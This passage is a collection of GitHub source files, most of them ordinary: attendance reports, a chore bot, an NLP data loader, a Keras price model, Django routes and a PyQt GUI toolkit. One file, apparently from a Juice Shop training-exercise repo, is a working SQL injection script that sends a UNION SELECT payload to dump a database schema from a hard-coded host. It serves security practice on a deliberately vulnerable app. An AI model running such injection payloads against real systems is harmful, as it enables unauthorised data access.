date[:-4]\r\n percentage_list.append(get_desday_att_percentage(str(date)))\r\n for per in percentage_list:\r\n x=x+per\r\n return x/len(percentage_list)\r\n\r\n\r\n\r\n\r\n\r\ndef get_desday_att_percentage(date):\r\n csv_file_path = './Data/reports/'+date+'.csv'\r\n pickle_file_path = './Data/encodings/face_names.pkl'\r\n x = int()\r\n y = int() \r\n if checkfile(csv_file_path):\r\n if checkfile(pickle_file_path):\r\n x = get_total_students(pickle_file_path)\r\n y = get_total_col(csv_file_path)\r\n return (y/x)*100\r\n else:\r\n print(\"There are no students registered \")\r\n else:\r\n print(\"Today's attendance not taken \")\r\n\r\n\r\n\r\n# def get_specific_day_att_per(date):\r\n# return get_desday_att_percentage(date)\r\n\r\n\r\ndef get_specific_day_att_per(date):\r\n if checkfile('./Data/reports/'+date+'.csv'):\r\n return get_desday_att_percentage(date)\r\n else:\r\n return \"Report not exist !\"\r\n\r\n\r\ndef get_specific_day_reports_desktop(date):\r\n desktop_path = os.path.expanduser(\"~\\\\Desktop\")\r\n desktop_path = desktop_path + '\\\\'+date+'.csv'\r\n file_path = \"./Data/reports/\"+date+\".csv\"\r\n if os.path.isdir(desktop_path): \r\n shutil.rmtree(desktop_path)\r\n if checkfile(file_path):\r\n shutil.copy2(file_path, desktop_path)\r\n return date+\": Report Sucessfully stored at Location :: /desktop/\"\r\n else:\r\n return \"Report not exist !\"", "repo_name": "idileepd/Face-Recognition-Based-Attendance-System", "sub_path": "Software/get_reports.py", "file_name": "get_reports.py", "file_ext": "py", "file_size_in_byte": 3521, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "31", "api": [{"api_name": "time.time", "line_number": 11, "usage_type": "call"}, {"api_name": "datetime.datetime.fromtimestamp", "line_number": 12, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 12, "usage_type": "attribute"}, {"api_name": "pickle.load", "line_number": 30, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 35, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 45, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 53, "usage_type": "call"}, {"api_name": "os.path", "line_number": 53, "usage_type": "attribute"}, {"api_name": "os.path.expanduser", "line_number": 60, "usage_type": "call"}, {"api_name": "os.path", "line_number": 60, "usage_type": "attribute"}, {"api_name": "os.path.isdir", "line_number": 62, "usage_type": "call"}, {"api_name": "os.path", "line_number": 62, "usage_type": "attribute"}, {"api_name": "shutil.rmtree", "line_number": 63, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 65, "usage_type": "call"}, {"api_name": "shutil.copy2", "line_number": 67, "usage_type": "call"}, {"api_name": "os.path.expanduser", "line_number": 115, "usage_type": "call"}, {"api_name": "os.path", "line_number": 115, "usage_type": "attribute"}, {"api_name": "os.path.isdir", "line_number": 118, "usage_type": "call"}, {"api_name": "os.path", "line_number": 118, "usage_type": "attribute"}, {"api_name": "shutil.rmtree", "line_number": 119, "usage_type": "call"}, {"api_name": "shutil.copy2", "line_number": 121, "usage_type": "call"}]}
+{"seq_id": "25979270074", "text": "\"\"\"\nThis is just that part that deals with very basic search queries to mongodb.\nThe reason behind including these functions is that they were used multiple\ntimes in the code.\n\"\"\"\n\nimport logging\nfrom typing import Tuple, Union\n\nfrom loader import queues, teams, users\n\n\nasync def get_team_id(user_id: int) -> Union[int, None]:\n \"\"\"Return the team id of a user based on their user id.\"\"\"\n data = await users.find_one(\n {\"user_id\": user_id},\n {\"team_id\": 1, \"_id\": 0},\n )\n\n if data:\n team_id = data.get(\"team_id\")\n else:\n team_id = None\n\n return team_id\n\n\nasync def get_team_members(user_id: int) -> dict:\n \"\"\"Return the team members a user has based on their user id.\"\"\"\n team_id = await get_team_id(user_id)\n team_data = await teams.find_one(\n {\"id\": team_id},\n {\"members\": 1, \"_id\": 0},\n )\n members = team_data[\"members\"]\n\n return members\n\n\nasync def get_team_chat(user_id: int) -> Union[int, None]:\n \"\"\"Return the team's Telegram group chat id.\"\"\"\n team_id = await get_team_id(user_id)\n team_data = await teams.find_one(\n {\"id\": team_id},\n {\"group_chat_id\": 1, \"_id\": 0},\n )\n\n try:\n group_chat_id = team_data[\"group_chat_id\"]\n except KeyError:\n group_chat_id = None\n\n return group_chat_id\n\n\nasync def get_queue_array(team_id: int, queue_name: str) -> list:\n \"\"\"Return queue array for a team's specific queue.\"\"\"\n queues_data = await queues.find_one(\n {\"id\": team_id},\n {\"queues\": 1, \"_id\": 0},\n )\n queue_array = queues_data[\"queues\"][queue_name]\n\n return queue_array\n\n\nasync def get_queue_list(queue_array: list) -> str:\n \"\"\"Return the queue list using the queue array.\"\"\"\n queue_list = \"\"\n for index, member in enumerate(queue_array, start=1):\n name = member[\"name\"]\n current_turn = member[\"current_turn\"]\n\n if current_turn:\n queue_list += f\"{index}. {name} \\n\"\n else:\n queue_list += f\"{index}. {name}\\n\"\n\n return queue_list\n\n\nasync def get_setup_person(team_id: int) -> str:\n \"\"\"Return the name of the setup person (aka admin) in a team\"\"\"\n setup_person = await users.find_one(\n {\"user_id\": team_id},\n {\"name\": 1, \"_id\": 0},\n )\n\n return setup_person[\"name\"]\n\n\nasync def get_current_turn(queue_array: list) -> Tuple[int, str, int]:\n \"\"\"Get the person whose turn it is to do the chore in a queue.\n\n Returns\n -------\n Tuple[int, str, int]\n A tuple of form: (user_id, user_name, index_position)\n \"\"\"\n for index, member in enumerate(queue_array):\n if member[\"current_turn\"]:\n data: Tuple[int, str, int] = (member[\"user_id\"], member[\"name\"], index)\n return data\n\n logging.error(\"Current turn person not found.\")\n return (0, \"\", 0)\n", "repo_name": "dkmlv/maid-tg-bot", "sub_path": "utils/get_db_data.py", "file_name": "get_db_data.py", "file_ext": "py", "file_size_in_byte": 2847, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "31", "api": [{"api_name": "loader.users.find_one", "line_number": 15, "usage_type": "call"}, {"api_name": "loader.users", "line_number": 15, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 13, "usage_type": "name"}, {"api_name": "loader.teams.find_one", "line_number": 31, "usage_type": "call"}, {"api_name": "loader.teams", "line_number": 31, "usage_type": "name"}, {"api_name": "loader.teams.find_one", "line_number": 43, "usage_type": "call"}, {"api_name": "loader.teams", "line_number": 43, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 40, "usage_type": "name"}, {"api_name": "loader.queues.find_one", "line_number": 58, "usage_type": "call"}, {"api_name": "loader.queues", "line_number": 58, "usage_type": "name"}, {"api_name": "loader.users.find_one", "line_number": 84, "usage_type": "call"}, {"api_name": "loader.users", "line_number": 84, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 102, "usage_type": "name"}, {"api_name": "logging.error", "line_number": 105, "usage_type": "call"}, {"api_name": "typing.Tuple", "line_number": 92, "usage_type": "name"}]}
+{"seq_id": "20599829602", "text": "import numpy as np\nimport torch\nimport torch.utils.data as data\nimport config\nfrom tqdm import tqdm\n\nPAD_TOKEN = \"\"\nUNK_TOKEN = \"\"\nSTART_TOKEN = \"\"\nSTOP_TOKEN = \"\"\n\nPAD_ID = 0\nUNK_ID = 1\nSTART_ID = 2\nSTOP_ID = 3\n\n\ndef build_vocab(file_paths, max_vocab_size=50000, glove_path=None):\n counter = dict()\n word2embedding = dict()\n for file_path in file_paths:\n with open(file_path, \"r\", encoding=\"utf-8\") as f:\n for line in f:\n words = line.split()\n for word in words:\n if word not in counter:\n counter[word] = 1\n else:\n counter[word] += 1\n\n sorted_vocab = sorted(counter.items(), key=lambda kv: kv[1], reverse=True)\n sorted_vocab = sorted_vocab[:max_vocab_size]\n word2idx = {word: i for i, (word, freq) in enumerate(sorted_vocab, start=4)}\n word2idx[PAD_TOKEN] = 0\n word2idx[UNK_TOKEN] = 1\n word2idx[START_TOKEN] = 2\n word2idx[STOP_TOKEN] = 3\n idx2word = {i: word for word, i in word2idx.items()}\n\n with open(glove_path, \"r\", encoding=\"utf-8\") as f:\n for line in tqdm(f, total=int(2.2e6)):\n if config.debug:\n break\n word_vec = line.split(\" \")\n word = word_vec[0]\n vec = np.array(word_vec[1:], dtype=np.float32)\n word2embedding[word] = vec\n\n embedding = np.zeros((len(word2idx), 300), dtype=np.float32)\n for word, vec in word2embedding.items():\n if config.debug:\n break\n try:\n idx = word2idx[word]\n embedding[idx] = vec\n except KeyError:\n continue\n\n return word2idx, idx2word, embedding\n\n\nclass YelpDataset(data.Dataset):\n def __init__(self, pos_file_path, neg_file_path, word2idx, debug=False):\n pos_seqs = open(pos_file_path, \"r\", encoding=\"utf-8\").readlines()\n neg_seqs = open(neg_file_path, \"r\", encoding=\"utf-8\").readlines()\n pos_seqs = list(map(lambda line: line.strip(), pos_seqs))\n neg_seqs = list(map(lambda line: line.strip(), neg_seqs))\n\n pos_labels = np.ones((len(pos_seqs), 1))\n neg_labels = np.zeros((len(neg_seqs), 1))\n self.seqs = pos_seqs + neg_seqs\n self.labels = np.concatenate([pos_labels, neg_labels], axis=0)\n self.num_total_seqs = len(self.seqs)\n self.word2idx = word2idx\n if debug:\n self.seqs = self.seqs[:100]\n self.labels = self.labels[:100]\n self.num_total_seqs = len(self.seqs)\n\n def __getitem__(self, index):\n seq = self.seqs[index]\n label = torch.LongTensor(self.labels[index])\n seq = self.words2ids(seq)\n return seq, label\n\n def __len__(self):\n return self.num_total_seqs\n\n def words2ids(self, sentence):\n tokens = sentence.lower().split()\n sequence = []\n for token in tokens:\n if token in self.word2idx:\n sequence.append(self.word2idx[token])\n else:\n sequence.append(self.word2idx[UNK_TOKEN])\n sequence.append(self.word2idx[STOP_TOKEN])\n sequence = torch.Tensor(sequence)\n return sequence\n\n\ndef collate_fn(data):\n def merge(sequences):\n lengths = [len(seq) for seq in sequences]\n padded_seq = torch.zeros(len(sequences), max(lengths), dtype=torch.long)\n for i, seq in enumerate(sequences):\n end = lengths[i]\n padded_seq[i, :end] = seq[:end]\n return padded_seq, lengths\n\n data.sort(key=lambda x: len(x[0]), reverse=True)\n\n seqs, labels = zip(*data)\n seqs, seq_lens = merge(seqs)\n labels = torch.cat(labels, dim=0)\n\n return seqs, seq_lens, labels\n\n\ndef get_loader(pos_file_path, neg_file_path,\n word2idx, batch_size=32,\n debug=False, shuffle=True):\n\n dataset = YelpDataset(pos_file_path, neg_file_path, word2idx, debug=debug)\n data_loader = data.DataLoader(dataset,\n batch_size=batch_size,\n shuffle=shuffle,\n collate_fn=collate_fn)\n return data_loader\n", "repo_name": "Holmeswww/CPTG", "sub_path": "data_utils.py", "file_name": "data_utils.py", "file_ext": "py", "file_size_in_byte": 4171, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "tqdm.tqdm", "line_number": 41, "usage_type": "call"}, {"api_name": "config.debug", "line_number": 42, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 46, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 46, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 49, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 49, "usage_type": "attribute"}, {"api_name": "config.debug", "line_number": 51, "usage_type": "attribute"}, {"api_name": "torch.utils.data.Dataset", "line_number": 62, "usage_type": "attribute"}, {"api_name": "torch.utils.data", "line_number": 62, "usage_type": "name"}, {"api_name": "numpy.ones", "line_number": 69, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 70, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 72, "usage_type": "call"}, {"api_name": "torch.LongTensor", "line_number": 82, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 98, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 105, "usage_type": "call"}, {"api_name": "torch.long", "line_number": 105, "usage_type": "attribute"}, {"api_name": "torch.utils.data.sort", "line_number": 111, "usage_type": "call"}, {"api_name": "torch.utils.data", "line_number": 111, "usage_type": "name"}, {"api_name": "torch.utils.data", "line_number": 113, "usage_type": "name"}, {"api_name": "torch.cat", "line_number": 115, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 125, "usage_type": "call"}, {"api_name": "torch.utils.data", "line_number": 125, "usage_type": "name"}]}
+{"seq_id": "74471010967", "text": "import os\nimport configparser\n\ndef cf_dir(): \n if os.path.isfile('config.ini'): \n cfg = configparser.ConfigParser()\n cfg.read('config.ini')\n return cfg['data']['cf_output_dir']\n else: \n return './counterfactual_examples'\n\nclass IncrementIndex:\n def __init__(self):\n self._cnts = {}\n\n def next(self, key):\n if key not in self._cnts:\n self._cnts[key] = 0\n n = self._cnts[key]\n self._cnts[key] += 1\n return n\n\n", "repo_name": "fhvilshoj/ECINN", "sub_path": "utils.py", "file_name": "utils.py", "file_ext": "py", "file_size_in_byte": 497, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 8, "dataset": "github-code", "pt": "31", "api": [{"api_name": "os.path.isfile", "line_number": 5, "usage_type": "call"}, {"api_name": "os.path", "line_number": 5, "usage_type": "attribute"}, {"api_name": "configparser.ConfigParser", "line_number": 6, "usage_type": "call"}]}
+{"seq_id": "22189452822", "text": "from urllib.request import urlopen, Request\r\nfrom urllib.parse import quote\r\nfrom pprint import pprint\r\nfrom json import load\r\n\r\nresponse = urlopen(\r\n Request(\r\n f\"\"\"http://15.236.144.183:8082/rest/products/search?q={quote(\"banana'))UNION SELECT sql,2,3,4,5,6,7,8,9 FROM sqlite_master--\")}\"\"\",\r\n headers={\r\n \"Accept\": \"application/json, text/plain, */*\",\r\n \"Content-Type\": \"application/json\",\r\n \"Origin\": \"http://15.236.144.183:8082\",\r\n \"Referer\": \"http://15.236.144.183:8082/\",\r\n \"Cookie\": (\r\n \"language=en; welcomebanner_status=dismiss;\"\r\n \" continueCode=ZaRwEmgxBPbY2oq9vKejJz6AWLU9\"\r\n \"TLiKZSrMdpDWVQk837ZrnN1OX5y4lLMD; cookieconsent\"\r\n \"_status=dismiss\"\r\n ),\r\n },\r\n )\r\n)\r\npprint(load(response))", "repo_name": "mauricelambert/JuiceShopSolucesAutomation", "sub_path": "7_sql_schema.py", "file_name": "7_sql_schema.py", "file_ext": "py", "file_size_in_byte": 852, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "urllib.request.urlopen", "line_number": 6, "usage_type": "call"}, {"api_name": "urllib.request.Request", "line_number": 7, "usage_type": "call"}, {"api_name": "urllib.parse.quote", "line_number": 8, "usage_type": "call"}, {"api_name": "pprint.pprint", "line_number": 23, "usage_type": "call"}, {"api_name": "json.load", "line_number": 23, "usage_type": "call"}]}
+{"seq_id": "23389378515", "text": "import tensorflow as tf\nimport pandas as pd\nimport numpy as np\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n\n\n\n\n##Importando Datos\nhouse_df = pd.read_csv(\"Precios_hogares.csv\")\n\n\n\n#VISUALIZACION\nsns.scatterplot(x = 'sqft_living', y = 'price', data = house_df)\n\n\n\n#correlacion\nf, ax = plt.subplots(figsize = (20, 20))\nsns.heatmap(house_df.corr(), annot = True)\n\n\n#Limpieza de datos\nselected_features = ['bedrooms', 'bathrooms', 'sqft_living', 'sqft_lot', 'floors', 'sqft_above', 'sqft_basement']\n\n\nX = house_df[selected_features]\ny = house_df['price']\n\n\nfrom sklearn.preprocessing import MinMaxScaler\nscaler = MinMaxScaler()\nX_scaled = scaler.fit_transform(X)\n \n\n\n\n#Normalizando output\ny = y.values.reshape(-1,1)\ny_scaled = scaler.fit_transform(y)\n\n\n#Entrenamiento\nfrom sklearn.model_selection import train_test_split\n\nX_train, X_teste, y_train, y_test = train_test_split(X_scaled, y_scaled, test_size= 0.25)\n\n#Definir modelo\nmodel = tf.keras.models.Sequential()\n\nmodel.add(tf.keras.layers.Dense(units=100, activation='relu', input_shape=(7, )))\nmodel.add(tf.keras.layers.Dense(units=100, activation='relu'))\nmodel.add(tf.keras.layers.Dense(units=100, activation='relu'))\nmodel.add(tf.keras.layers.Dense(units=1, activation='linear'))\n\nmodel.summary()\n\nmodel.compile(optimizer= 'Adam', loss= 'mean_squared_error')\n\nepochs_hist = model.fit(X_train, y_train, epochs = 100, batch_size = 50, validation_split = 0.2)\n\n\n#Evaluando Modelo\nepochs_hist.history.keys()\n\n\n\n#Grafico\nplt.plot(epochs_hist.history['loss'])\nplt.plot(epochs_hist.history['val_loss'])\nplt.title('Progreso del Modelo durante Entrenamiento')\nplt.xlabel('Epoch')\nplt.ylabel('Training and Validation Loss')\nplt.legend(['Training Loss', 'Validation Loss'])\n\n\n\n#########PREDICTION!!!!!!!!!!!!\n\"\"\" 'bedrooms', 'bathrooms', 'sqft_living', 'sqft_lot', 'floors', 'sqft_above', 'sqft_basement' \"\"\"\n\nprint(\"Prediccion del precio de inmuebles\")\nprint(\"\")\n\nbedrooms = int(input(\"Numero de Cuartos: \"))\nbathrooms = int(input(\"Numero de baños: \"))\nfloors = int(input(\"Numero de pisos: \"))\nsqft_living = int(input(\"Area del inmueble (m^2): \")) \nsqft_lot = int(input(\"Area del lote (m^2): \"))\nsqft_above = int(input(\"Area de la terraza (m^2): \"))\nsqft_basement = int(input(\"Area del subterraneo/sotano (m^2): \"))\n\nX_test_1 = np.array([[ bedrooms, bathrooms, sqft_living , sqft_lot, floors, sqft_above, sqft_basement]])\n\n\nscaler_1 = MinMaxScaler()\nX_test_scaled_1 = scaler_1.fit_transform(X_test_1)\n\n#Haciendo prediccion\ny_predict_1 = model.predict(X_test_scaled_1)\ny_predict_1 = scaler.inverse_transform(y_predict_1)\n\n\nprint(\"El precio en dolares del inmueble es de: \", y_predict_1.max())\n\n\n\n\n\n\n\n\n\n\n\n\n\n", "repo_name": "EmilioCudriz/IAs", "sub_path": "IA_lvl1/04IA_BienesRaices.py", "file_name": "04IA_BienesRaices.py", "file_ext": "py", "file_size_in_byte": 2661, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "pandas.read_csv", "line_number": 11, "usage_type": "call"}, {"api_name": "seaborn.scatterplot", "line_number": 16, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 21, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 21, "usage_type": "name"}, {"api_name": "seaborn.heatmap", "line_number": 22, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.MinMaxScaler", "line_number": 34, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 48, "usage_type": "call"}, {"api_name": "tensorflow.keras.models.Sequential", "line_number": 51, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 51, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 53, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 53, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 54, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 54, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 55, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 55, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 56, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 56, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 71, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 71, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 72, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 72, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 73, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 73, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 74, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 74, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 75, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 75, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 76, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 76, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 94, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.MinMaxScaler", "line_number": 97, "usage_type": "call"}]}
+{"seq_id": "32064978299", "text": "from django.urls import path\nfrom limitedTimeDeal import views\n\nurlpatterns = [\n path('createUser', views.UserProfileApiView.as_view()),\n path('createDeal', views.DealApiView.as_view()),\n path('updateDeal//', views.UpdateDeal.as_view()),\n path('endDeal//', views.EndDeal.as_view()),\n path('claimDeal//', views.ClaimDealApiView.as_view()),\n \n]", "repo_name": "rahuljha009/Udaan", "sub_path": "limitedTimeDeal/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 399, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "django.urls.path", "line_number": 5, "usage_type": "call"}, {"api_name": "limitedTimeDeal.views.UserProfileApiView.as_view", "line_number": 5, "usage_type": "call"}, {"api_name": "limitedTimeDeal.views.UserProfileApiView", "line_number": 5, "usage_type": "attribute"}, {"api_name": "limitedTimeDeal.views", "line_number": 5, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 6, "usage_type": "call"}, {"api_name": "limitedTimeDeal.views.DealApiView.as_view", "line_number": 6, "usage_type": "call"}, {"api_name": "limitedTimeDeal.views.DealApiView", "line_number": 6, "usage_type": "attribute"}, {"api_name": "limitedTimeDeal.views", "line_number": 6, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 7, "usage_type": "call"}, {"api_name": "limitedTimeDeal.views.UpdateDeal.as_view", "line_number": 7, "usage_type": "call"}, {"api_name": "limitedTimeDeal.views.UpdateDeal", "line_number": 7, "usage_type": "attribute"}, {"api_name": "limitedTimeDeal.views", "line_number": 7, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 8, "usage_type": "call"}, {"api_name": "limitedTimeDeal.views.EndDeal.as_view", "line_number": 8, "usage_type": "call"}, {"api_name": "limitedTimeDeal.views.EndDeal", "line_number": 8, "usage_type": "attribute"}, {"api_name": "limitedTimeDeal.views", "line_number": 8, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 9, "usage_type": "call"}, {"api_name": "limitedTimeDeal.views.ClaimDealApiView.as_view", "line_number": 9, "usage_type": "call"}, {"api_name": "limitedTimeDeal.views.ClaimDealApiView", "line_number": 9, "usage_type": "attribute"}, {"api_name": "limitedTimeDeal.views", "line_number": 9, "usage_type": "name"}]}
+{"seq_id": "32208842104", "text": "import os, sys, traceback, threading\nfrom PyQt4 import QtGui, QtCore, QtWebKit\ntry:\n import json\nexcept:\n import simplejson as json\n\n#++++++++++++++++++++++++++++++++++++++++++++++++++++\n#TODO\n# Add more widgets\n# Add more attribute handling\n# Add more signal handling\n\n#----------------------------------------------------\n\ndef debug(text):\n sys.stderr.write(\"GUI: %s\\n\" % text)\n sys.stderr.flush()\n\n\n# Widget Base Classes - essentially used as 'Mixins' >>>>>>>>>>>>>>>>\nclass WBase:\n def x__tt(self, text):\n \"\"\"Set tooltip.\n \"\"\"\n self.setToolTip(text) #qt\n\n def x__text(self, text=\"\"):\n \"\"\"Set widget text.\n \"\"\"\n self.setText(text) #qt\n\n def enable(self, on):\n \"\"\"Enable/Disable widget. on should be True to enable the widget\n (display it in its normal, active state), False to disable it\n (which will normally be paler and non-interactive).\n \"\"\"\n self.setEnabled(on) #qt\n\n def focus(self):\n self.setFocus() #qt\n\n def x__width(self, w):\n \"\"\"Set the minimum width for the widget.\n \"\"\"\n self.setMinimumWidth(w) #qt\n\n def x__typewriter(self, on):\n \"\"\"Use a typewriter (fixed spacing) font.\n \"\"\"\n if on:\n f = QtGui.QFont(self.font()) #qt\n f.setFamily(\"Courier\") #qt\n self.setFont(f) #qt\n\n\nclass BBase:\n \"\"\"Button mixin.\n \"\"\"\n def x__icon(self, icon):\n self.setIcon(self.style().standardIcon(icondict[icon])) #qt\n\n#qt\nicondict = { \"left\" : QtGui.QStyle.SP_ArrowLeft,\n \"right\" : QtGui.QStyle.SP_ArrowRight,\n \"down\" : QtGui.QStyle.SP_ArrowDown,\n \"up\" : QtGui.QStyle.SP_ArrowUp,\n \"reload\" : QtGui.QStyle.SP_BrowserReload,\n }\n\n\nclass TopLevel:\n def setVisible(self, on=True):\n self.setVisible(on) #qt\n\n def x__size(self, w_h):\n w, h = [int(i) for i in w_h.split(\"_\")]\n self.resize(w, h) #qt\n\n def x__icon(self, iconpath):\n guiapp.qtapp.setWindowIcon(QtGui.QIcon(iconpath)) #qt\n\n def x__title(self, text):\n self.setWindowTitle(text) #qt\n\n def getSize(self):\n s = self.size() #qt\n return \"%d_%d\" % (s.width(), s.height()) #qt\n\n def getScreenSize(self):\n dw = guiapp.qtapp.desktop() #qt\n geom = dw.screenGeometry(self) #qt\n return \"%d_%d\" % (geom.width(), geom.height()) #qt\n\n#<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<\n\nclass Window(QtGui.QWidget, TopLevel): #qt\n \"\"\"This is needed to trap window closing events. It also supports\n a 'busy' mechanism.\n \"\"\"\n def __init__(self):\n QtGui.QWidget.__init__(self) #qt\n self.closesignal = \"\"\n self.busystate = False\n self.busy_lock = threading.Lock()\n\n def closeEvent(self, event): #qt\n if self.closesignal:\n guiapp.sendsignal(self.closesignal)\n event.ignore() #qt\n return\n guiapp.send(\"/\", \"1\")\n QtGui.QWidget.closeEvent(self, event) #qt\n\n def x__closesignal(self, text):\n self.closesignal = text\n\n def busy(self, widgets, on, busycursor=True):\n \"\"\"This activates (or deactivates, for on=False) a 'busy' mechanism,\n which can be one or both of the following:\n Make the application's cursor change to the 'busy cursor'.\n Disable a group of widgets.\n There is a lock to prevent the busy state from being set when it\n is already active.\n \"\"\"\n # I couldn't get the following calls to work:\n # w.setCursor(QtCore.Qt.BusyCursor)\n # w.unsetCursor()\n self.busy_lock.acquire()\n if on:\n if self.busystate:\n debug(\"*ERROR* Attempt to set busy state twice\")\n self.busy_lock.release()\n return\n self.busycursor = busycursor\n if busycursor:\n guiapp.qtapp.setOverrideCursor(QtCore.Qt.BusyCursor) #qt\n else:\n if not self.busystate:\n debug(\"*ERROR* Attempt to release busy state twice\")\n self.busy_lock.release()\n return\n if self.busycursor:\n guiapp.qtapp.restoreOverrideCursor() #qt\n self.busystate = on\n self.busy_lock.release()\n for wn in widgets:\n w = guiapp.getwidget(wn)\n if w:\n w.setEnabled(not on) #qt\n else:\n debug(\"*ERROR* No widget '%s'\" % wn)\n\n\nclass Dialog(QtGui.QDialog, TopLevel):\n def __init__(self):\n QtGui.QDialog.__init__(self) #qt\n\n def showmodal(self):\n return self.exec_() == QtGui.QDialog.Accepted #qt\n\n\nclass DialogButtons(QtGui.QDialogButtonBox): #qt\n def __init__(self):\n return\n\n def x__buttons(self, args):\n \"\"\"This keyword argument MUST be present.\n \"\"\"\n buttons = 0\n for a in args:\n try:\n b = getattr(QtGui.QDialogButtonBox, a) #qt\n assert isinstance(b, int) #qt\n buttons |= b #qt\n except:\n gui_warning(\"Unknown Dialog button: %s\" % a)\n QtGui.QDialogButtonBox.__init__(self, buttons) #qt\n\n def x__dialog(self, dname):\n \"\"\"This must be set or else the dialog buttons won't do anything.\n \"\"\"\n self._dialog = guiapp.getwidget(dname)\n self.connect(self, QtCore.SIGNAL(\"clicked(QAbstractButton *)\"), #qt\n self._clicked) #qt\n\n def _clicked(self, button): #qt\n if self.buttonRole(button) == self.AcceptRole: #qt\n self._dialog.accept() #qt\n else:\n self._dialog.reject() #qt\n\n\ndef textLineDialog(label=None, title=None, text=\"\", pw=False):\n if label == None:\n label = \"Enter the value here:\"\n if title == None:\n title = \"Enter Information\"\n if pw:\n echo = QtGui.QLineEdit.Password #qt\n else:\n echo = QtGui.QLineEdit.Normal #qt\n result, ok = QtGui.QInputDialog.getText(None, #qt\n title, label, echo, text) #qt\n return (ok, unicode(result))\n\n\ndef confirmDialog(message, title=None):\n if title == None:\n title = \"Confirmation\"\n return (QtGui.QMessageBox.question(None, title, message, #qt\n QtGui.QMessageBox.Yes | QtGui.QMessageBox.Cancel) == #qt\n QtGui.QMessageBox.Yes) #qt\n\n\ndef infoDialog(message, title=None):\n if title == None:\n title = \"Information\"\n QtGui.QMessageBox.information(None, title, message) #qt\n\n\n#+++++++++++++++++++++++++++\n# Error handling\ndef gui_error(message, title=None):\n if title == None:\n title = \"Error\"\n QtGui.QMessageBox.critical(None, title, message) #qt\n guiapp.qtapp.exit(1) #qt\n\ndef gui_warning(message, title=None):\n if title == None:\n title = \"Warning\"\n QtGui.QMessageBox.warning(None, title, message) #qt\n\ndef onexcept(text):\n debug(traceback.format_exc())\n gui_error(text, \"Exception\")\n#---------------------------\n\nfileDialogDir = \"/\"\ndef fileDialog(message, start=None, title=None, dir=False, create=False, filter=None):\n # filter is a list: first a textual description, then acceptable glob filenames\n global fileDialogDir\n if not start:\n start = fileDialogDir\n dlg = QtGui.QFileDialog(None, message, start) #qt\n if title:\n dlg.setWindowTitle(title) #qt\n dlg.setReadOnly(not create) #qt\n if dir:\n dlg.setFileMode(dlg.Directory) #qt\n elif not create:\n dlg.setFileMode(dlg.ExistingFile) #qt\n if filter:\n dlg.setNameFilter(\"%s (%s)\" % (filter[0], \" \".join(filter[1:]))) #qt\n if dlg.exec_():\n path = str(dlg.selectedFiles()[0]).strip()\n if os.path.isdir(path):\n fileDialogDir = path\n elif 